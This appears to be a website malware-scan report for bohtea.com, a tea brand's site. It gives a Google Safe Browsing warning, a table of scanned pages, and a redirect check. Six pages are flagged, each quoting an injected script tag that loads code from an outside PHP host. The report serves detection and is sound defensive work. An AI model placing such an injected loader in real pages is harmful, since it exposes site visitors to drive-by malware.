Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bohtea.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.bohtea.com/ | 200 OK Content-Length: 11140 Content-Type: text/html | clean |
http://www.bohtea.com/js/jquery.min.js | 200 OK Content-Length: 57272 Content-Type: application/javascript | clean |
http://www.bohtea.com/js/image_slide.js | 200 OK Content-Length: 2369 Content-Type: application/javascript | clean |
http://www.bohtea.com/js/jquery.easing.min.js | 200 OK Content-Length: 2595 Content-Type: application/javascript | clean |
http://www.bohtea.com/js/jquery.lavalamp.min.js | 200 OK Content-Length: 724 Content-Type: application/javascript | clean |
http://www.bohtea.com/jquery-1.7.1.min.js | 200 OK Content-Length: 93867 Content-Type: application/javascript | clean |
http://www.bohtea.com/fotorama.js | 200 OK Content-Length: 30494 Content-Type: application/javascript | clean |
http://www.bohtea.com/index.html | 200 OK Content-Length: 11140 Content-Type: text/html | clean |
http://www.bohtea.com/homeBOH.html | 200 OK Content-Length: 8355 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://trademarkliving.dk/f2dvz3yg.php?id=$frameid"></script> | ||
http://www.bohtea.com/shareTheUmph.html | 200 OK Content-Length: 7809 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://trademarkliving.dk/f2dvz3yg.php?id=$frameid"></script> | ||
http://www.bohtea.com/steppingBackDiscBoh.html | 200 OK Content-Length: 9078 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://trademarkliving.dk/f2dvz3yg.php?id=$frameid"></script> | ||
http://www.bohtea.com/steppingBackExpBoh.html | 200 OK Content-Length: 7790 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://trademarkliving.dk/f2dvz3yg.php?id=$frameid"></script> | ||
http://www.bohtea.com/bohPlantations.html | 200 OK Content-Length: 8645 Content-Type: text/html | clean |
http://www.bohtea.com/televisionCommercial.html | 200 OK Content-Length: 8954 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://trademarkliving.dk/f2dvz3yg.php?id=$frameid"></script> | ||
http://www.bohtea.com/whatIsTea.html | 200 OK Content-Length: 8292 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://trademarkliving.dk/f2dvz3yg.php?id=$frameid"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bohtea.com
Result:
GET / HTTP/1.1
Host: bohtea.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bohtea.com
Referer: http://www.google.com/search?q=bohtea.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bohtea.com
Referer: http://www.google.com/search?q=bohtea.com
Result:
The result is similar to the first query. There are no suspicious redirects found.